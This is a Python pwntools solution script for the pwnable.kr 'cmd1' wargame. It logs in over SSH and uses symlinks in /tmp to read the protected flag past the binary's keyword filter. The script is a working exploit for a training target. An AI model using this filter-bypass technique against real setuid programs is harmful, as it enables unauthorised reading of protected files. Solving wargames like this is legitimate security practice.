"""
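In this challenge we have a binary that plays with the PATH variable, but there is nothing difficult to do here.
Just go to /tmp and create a new folder with soft links to cmd1 and flag.
The script links the flag under the name `key` and calls cat by its absolute path, so the command passed to cmd1 does not rely on a PATH lookup.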
"""
from pwn import *
from random import randint
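def exploit():
    """Run the cmd1 wargame solution over SSH and print the binary's output.

    Steps, all performed on the remote host:
      1. Create a scratch folder under /tmp holding two symlinks:
         ``cmd1`` -> ``~/cmd1`` and ``key`` -> ``~/flag``.
      2. Run ``./cmd1`` from that folder with the single argument
         ``/bin/cat key`` and print everything it writes.
      3. Remove the symlinks and the folder, then close the SSH session.

    Returns:
        None. The remote binary's output is printed to stdout.
    """
    # connect
    s = ssh(user='cmd1', host='pwnable.kr', password='guest', port=2222)
    try:
        # rand number which will be our folder name
        # NOTE(review): the range is small and /tmp is shared, so the name can
        # already exist; `mkdir` then fails and the `&&` chain stops before
        # the symlinks are created.
        rand_foldername = str(randint(10, 300))
        print(f'Create folder with name {rand_foldername}')
        workdir = '/tmp/' + rand_foldername

        # parts of oneliner
        ln_s = 'ln -s '
        all_cmd = ' && '.join([
            'cd /tmp',
            'mkdir ' + rand_foldername,
            'cd ' + rand_foldername,
            ln_s + '~/cmd1 cmd1',
            ln_s + '~/flag key',
        ])
        print(f'Sent next command: {all_cmd}')
        setup = s.process(all_cmd, shell=True)
        # Block until the setup shell exits; otherwise the next process can
        # start before the folder and symlinks exist.
        setup.recvall()
        setup.close()

        try:
            # Execute our binary. cat is named by absolute path, so this
            # argument does not depend on how PATH is set.
            p = s.process(executable='./cmd1',
                          argv=['./cmd1', '/bin/cat key'],
                          cwd=workdir)
            try:
                print(p.recvall().decode('utf-8'))
            finally:
                p.close()
        finally:
            # Clean the remaining files and folder, even if the run failed.
            cmd = ' && '.join([
                'cd ' + workdir,
                'rm cmd1 key',
                'cd ..',
                'rmdir ' + rand_foldername,
            ])
            cleanup = s.process(cmd, shell=True)
            # Wait for the cleanup to finish before the session is closed.
            cleanup.recvall()
            cleanup.close()
    finally:
        # The original never closed the SSH session.
        s.close()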
# Run the solution only when this file is executed as a script,
# not when it is imported.
if __name__ == '__main__':
    exploit()